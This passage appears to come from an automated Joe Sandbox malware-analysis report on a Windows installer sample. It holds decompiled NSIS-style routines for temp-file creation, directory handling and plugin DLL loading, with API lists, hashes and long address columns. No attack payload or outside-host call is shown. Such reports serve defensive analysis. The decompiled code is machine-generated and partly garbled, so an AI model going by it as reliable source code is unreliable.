                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                              • API String ID: 3449924974-3355392842
                                                                                                                              • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                              • Instruction ID: 6b4cde1861b350949670c47dbaa51c368922036badf300449d23a0f4a4187d7a
                                                                                                                              • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                              • Instruction Fuzzy Hash: D0010871D10219EADF109BA0C984BEFBFB4EB04314F04853AD545B6180D77896488FA9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 6F001817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 883 6f001817-6f001856 call 6f001bff 887 6f001976-6f001978 883->887 888 6f00185c-6f001860 883->888 889 6f001862-6f001868 call 6f00243e 888->889 890 6f001869-6f001876 call 6f002480 888->890 889->890 895 6f0018a6-6f0018ad 890->895 896 6f001878-6f00187d 890->896 897 6f0018cd-6f0018d1 895->897 898 6f0018af-6f0018cb call 6f002655 call 6f001654 call 6f001312 GlobalFree 895->898 899 6f001898-6f00189b 896->899 900 6f00187f-6f001880 896->900 901 6f0018d3-6f00191c call 6f001666 call 6f002655 897->901 902 6f00191e-6f001924 call 6f002655 897->902 924 6f001925-6f001929 898->924 899->895 903 6f00189d-6f00189e call 6f002e23 899->903 905 6f001882-6f001883 900->905 906 6f001888-6f001889 call 6f002b98 900->906 901->924 902->924 918 6f0018a3 903->918 907 6f001890-6f001896 call 6f002810 905->907 908 6f001885-6f001886 905->908 915 6f00188e 906->915 923 6f0018a5 907->923 908->895 908->906 915->918 918->923 923->895 927 6f001966-6f00196d 924->927 928 6f00192b-6f001939 call 6f002618 924->928 927->887 930 6f00196f-6f001970 GlobalFree 927->930 933 6f001951-6f001958 928->933 934 6f00193b-6f00193e 928->934 930->887 933->927 936 6f00195a-6f001965 call 6f0015dd 933->936 934->933 935 6f001940-6f001948 934->935 935->933 937 6f00194a-6f00194b FreeLibrary 935->937 936->927 937->933
                                                                                                                              C-Code - Quality: 88%
                                                                                                                              			E6F001817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x6f00506c = _a8;
				 *0x6f005070 = _a16;
				 *0x6f005074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x6f005048, E6F001651);
				_push(1); // executed
				_t37 = E6F001BFF(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E6F00243E(_t54);
					}
					_push(_t54);
					E6F002480(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E6F002655();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E6F001666(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E6F002655();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E6F002655();
							_t37 = GlobalFree(E6F001312(E6F001654(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E6F002618(_t54);
							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E6F0015DD( *0x6f005068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E6F002E23(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E6F002B98(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E6F002810(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}


















                                                                                                                              0x6f001817
                                                                                                                              0x6f001817
                                                                                                                              0x6f001817
                                                                                                                              0x6f001824
                                                                                                                              0x6f00182c
                                                                                                                              0x6f001839
                                                                                                                              0x6f001847
                                                                                                                              0x6f00184a
                                                                                                                              0x6f00184c
                                                                                                                              0x6f001851
                                                                                                                              0x6f001856
                                                                                                                              0x6f001978
                                                                                                                              0x6f001978
                                                                                                                              0x6f00185c
                                                                                                                              0x6f001860
                                                                                                                              0x6f001863
                                                                                                                              0x6f001868
                                                                                                                              0x6f001869
                                                                                                                              0x6f00186a
                                                                                                                              0x6f001870
                                                                                                                              0x6f001876
                                                                                                                              0x6f0018a6
                                                                                                                              0x6f0018ad
                                                                                                                              0x6f0018d1
                                                                                                                              0x6f00191e
                                                                                                                              0x6f00191f
                                                                                                                              0x6f0018d3
                                                                                                                              0x6f0018d3
                                                                                                                              0x6f0018d4
                                                                                                                              0x6f0018dd
                                                                                                                              0x6f0018de
                                                                                                                              0x6f0018e8
                                                                                                                              0x6f0018eb
                                                                                                                              0x6f0018f0
                                                                                                                              0x6f0018f7
                                                                                                                              0x6f0018f7
                                                                                                                              0x6f0018fd
                                                                                                                              0x6f0018fe
                                                                                                                              0x6f001904
                                                                                                                              0x6f00190a
                                                                                                                              0x6f001917
                                                                                                                              0x6f001918
                                                                                                                              0x6f00191b
                                                                                                                              0x6f0018af
                                                                                                                              0x6f0018af
                                                                                                                              0x6f0018b0
                                                                                                                              0x6f0018c5
                                                                                                                              0x6f0018c5
                                                                                                                              0x6f001929
                                                                                                                              0x6f00192c
                                                                                                                              0x6f001939
                                                                                                                              0x6f001940
                                                                                                                              0x6f001948
                                                                                                                              0x6f00194b
                                                                                                                              0x6f00194b
                                                                                                                              0x6f001948
                                                                                                                              0x6f001958
                                                                                                                              0x6f001960
                                                                                                                              0x6f001965
                                                                                                                              0x6f001958
                                                                                                                              0x6f00196d
                                                                                                                              0x00000000
                                                                                                                              0x6f00196f
                                                                                                                              0x00000000
                                                                                                                              0x6f001970
                                                                                                                              0x6f00196d
                                                                                                                              0x6f00187a
                                                                                                                              0x6f00187d
                                                                                                                              0x6f00189b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f00189e
                                                                                                                              0x6f0018a3
                                                                                                                              0x6f0018a3
                                                                                                                              0x6f0018a5
                                                                                                                              0x00000000
                                                                                                                              0x6f0018a5
                                                                                                                              0x6f00187f
                                                                                                                              0x6f001880
                                                                                                                              0x6f001888
                                                                                                                              0x6f001889
                                                                                                                              0x00000000
                                                                                                                              0x6f001889
                                                                                                                              0x6f001882
                                                                                                                              0x6f001883
                                                                                                                              0x6f001891
                                                                                                                              0x00000000
                                                                                                                              0x6f001891
                                                                                                                              0x6f001886
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f001886

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 6F001BFF: GlobalFree.KERNEL32(?), ref: 6F001E74
                                                                                                                                • Part of subcall function 6F001BFF: GlobalFree.KERNEL32(?), ref: 6F001E79
                                                                                                                                • Part of subcall function 6F001BFF: GlobalFree.KERNEL32(?), ref: 6F001E7E
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F0018C5
                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 6F00194B
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F001970
                                                                                                                                • Part of subcall function 6F00243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6F00246F
                                                                                                                                • Part of subcall function 6F002810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F001896,00000000), ref: 6F0028E0
                                                                                                                                • Part of subcall function 6F001666: wsprintfW.USER32 ref: 6F001694
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41989007349.000000006F001000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41988874344.000000006F000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41989151475.000000006F004000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41989215917.000000006F006000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_6f000000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3962662361-3916222277
                                                                                                                              • Opcode ID: 1f391305c4f1fd57d559b3968d1ca5bd479ffbd5857cfed049fd075e0f630f75
                                                                                                                              • Instruction ID: fd912d17c26d79232bb763860ac9c87698141cd9c2624f48f72de7a9cd7954f4
                                                                                                                              • Opcode Fuzzy Hash: 1f391305c4f1fd57d559b3968d1ca5bd479ffbd5857cfed049fd075e0f630f75
                                                                                                                              • Instruction Fuzzy Hash: A3418D71800745AAFB10BF74DC88BD937E8AF0631CF44446AEE59AB0C6DB78A1848764
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00406039 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 940 406039-406045 941 406046-40607a GetTickCount GetTempFileNameW 940->941 942 406089-40608b 941->942 943 40607c-40607e 941->943 945 406083-406086 942->945 943->941 944 406080 943->944 944->945
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00406039(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                                                                                              0x0040603f
                                                                                                                              0x00406045
                                                                                                                              0x00406046
                                                                                                                              0x00406046
                                                                                                                              0x0040604b
                                                                                                                              0x0040604c
                                                                                                                              0x0040604f
                                                                                                                              0x00406054
                                                                                                                              0x00406057
                                                                                                                              0x00406061
                                                                                                                              0x0040606e
                                                                                                                              0x00406072
                                                                                                                              0x0040607a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040607e
                                                                                                                              0x00000000
                                                                                                                              0x00406080
                                                                                                                              0x00406080
                                                                                                                              0x00406080
                                                                                                                              0x00406083
                                                                                                                              0x00406086
                                                                                                                              0x00406086
                                                                                                                              0x00406089
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • GetTickCount.KERNEL32 ref: 00406057
                                                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403508,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406072
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                              • API String ID: 1716503409-944333549
                                                                                                                              • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                              • Instruction ID: d9a4429216a2c16f2b1e0ff0632edab8c7003fcac11a898ec3991e0c35e2d836
                                                                                                                              • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                              • Instruction Fuzzy Hash: 84F0F076B40204BFEB00CF59ED05E9EB7ACEB95750F01803AEE45F3140E6B099648768
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 950 4020d8-4020e4 951 4021a3-4021a5 950->951 952 4020ea-402100 call 402da6 * 2 950->952 954 4022f1-4022f6 call 401423 951->954 962 402110-40211f LoadLibraryExW 952->962 963 402102-40210e GetModuleHandleW 952->963 960 402c2a-402c39 954->960 961 40292e-402935 954->961 961->960 966 402121-402130 call 406956 962->966 967 40219c-40219e 962->967 963->962 963->966 970 402132-402138 966->970 971 40216b-402170 call 40557c 966->971 967->954 973 402151-402164 call 6f001817 970->973 974 40213a-402146 call 401423 970->974 975 402175-402178 971->975 977 402166-402169 973->977 974->975 984 402148-40214f 974->984 975->960 978 40217e-402188 call 403b69 975->978 977->975 978->960 983 40218e-402197 FreeLibrary 978->983 983->960 984->975
                                                                                                                              C-Code - Quality: 60%
                                                                                                                              			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x7a8b20");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x7a8ae8 =  *0x7a8ae8 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406956(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E0040557C(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce28, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B69( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                                                              0x004020d8
                                                                                                                              0x004020d8
                                                                                                                              0x004020dd
                                                                                                                              0x004020e4
                                                                                                                              0x004021a3
                                                                                                                              0x004022f1
                                                                                                                              0x004022f1
                                                                                                                              0x00402c2a
                                                                                                                              0x00402c2d
                                                                                                                              0x00402c39
                                                                                                                              0x00402c39
                                                                                                                              0x004020f3
                                                                                                                              0x004020fd
                                                                                                                              0x00402100
                                                                                                                              0x00402110
                                                                                                                              0x00402114
                                                                                                                              0x0040211a
                                                                                                                              0x0040211c
                                                                                                                              0x0040211f
                                                                                                                              0x0040219c
                                                                                                                              0x00000000
                                                                                                                              0x0040219c
                                                                                                                              0x00402121
                                                                                                                              0x0040212c
                                                                                                                              0x00402130
                                                                                                                              0x00402170
                                                                                                                              0x00402132
                                                                                                                              0x00402135
                                                                                                                              0x00402138
                                                                                                                              0x00402164
                                                                                                                              0x0040213a
                                                                                                                              0x0040213d
                                                                                                                              0x00402146
                                                                                                                              0x00402148
                                                                                                                              0x00402148
                                                                                                                              0x00402146
                                                                                                                              0x00402138
                                                                                                                              0x00402178
                                                                                                                              0x00402191
                                                                                                                              0x00402191
                                                                                                                              0x00000000
                                                                                                                              0x00402178
                                                                                                                              0x00402103
                                                                                                                              0x0040210b
                                                                                                                              0x0040210e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                                                                • Part of subcall function 0040557C: lstrlenW.KERNEL32(007A0F28,00000000,0079BD28,76D723A0,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
                                                                                                                                • Part of subcall function 0040557C: lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079BD28,76D723A0,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
                                                                                                                                • Part of subcall function 0040557C: lstrcatW.KERNEL32(007A0F28,004033F5), ref: 004055D7
                                                                                                                                • Part of subcall function 0040557C: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004055E9
                                                                                                                                • Part of subcall function 0040557C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
                                                                                                                                • Part of subcall function 0040557C: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
                                                                                                                                • Part of subcall function 0040557C: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637
                                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                                                              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 334405425-0
                                                                                                                              • Opcode ID: 688cee1cde8ba92b562b3ba80e2bde83ced805693af450c3221be772be186c94
                                                                                                                              • Instruction ID: 444e3b163f15bd358be0b4800c507c2147bc3560cfb58e26f6c7225f93e15a3b
                                                                                                                              • Opcode Fuzzy Hash: 688cee1cde8ba92b562b3ba80e2bde83ced805693af450c3221be772be186c94
                                                                                                                              • Instruction Fuzzy Hash: D621D471904104FACF11AFA5CF48E9E7A71BF48354F20413BF505B91E1DBBD8A929A1D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 86%
                                                                                                                              			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405E94(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E16(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AC8( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405AE5(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A4B( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040651A(0x7b4000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                                                                                              0x004015c1
                                                                                                                              0x004015c9
                                                                                                                              0x004015cc
                                                                                                                              0x004015d1
                                                                                                                              0x004015d5
                                                                                                                              0x004015d7
                                                                                                                              0x004015df
                                                                                                                              0x004015e1
                                                                                                                              0x004015e4
                                                                                                                              0x004015ea
                                                                                                                              0x00401604
                                                                                                                              0x00401607
                                                                                                                              0x004015ec
                                                                                                                              0x004015ec
                                                                                                                              0x004015ef
                                                                                                                              0x00000000
                                                                                                                              0x004015fa
                                                                                                                              0x004015fd
                                                                                                                              0x004015fd
                                                                                                                              0x004015ef
                                                                                                                              0x0040160e
                                                                                                                              0x00401615
                                                                                                                              0x00401624
                                                                                                                              0x00401624
                                                                                                                              0x00401617
                                                                                                                              0x0040161a
                                                                                                                              0x00401622
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00401622
                                                                                                                              0x00401615
                                                                                                                              0x00401627
                                                                                                                              0x0040162b
                                                                                                                              0x0040162c
                                                                                                                              0x004015d7
                                                                                                                              0x00401634
                                                                                                                              0x00401663
                                                                                                                              0x004022f1
                                                                                                                              0x00401636
                                                                                                                              0x00401638
                                                                                                                              0x00401645
                                                                                                                              0x0040164d
                                                                                                                              0x00401655
                                                                                                                              0x0040165b
                                                                                                                              0x0040165b
                                                                                                                              0x00401655
                                                                                                                              0x00402c2d
                                                                                                                              0x00402c39

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00405E94: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,?,00405F08,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,76D73420,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76D73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EA2
                                                                                                                                • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EA7
                                                                                                                                • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EBF
                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                • Part of subcall function 00405A4B: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A8E
                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,007B4000,?,00000000,000000F0), ref: 0040164D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
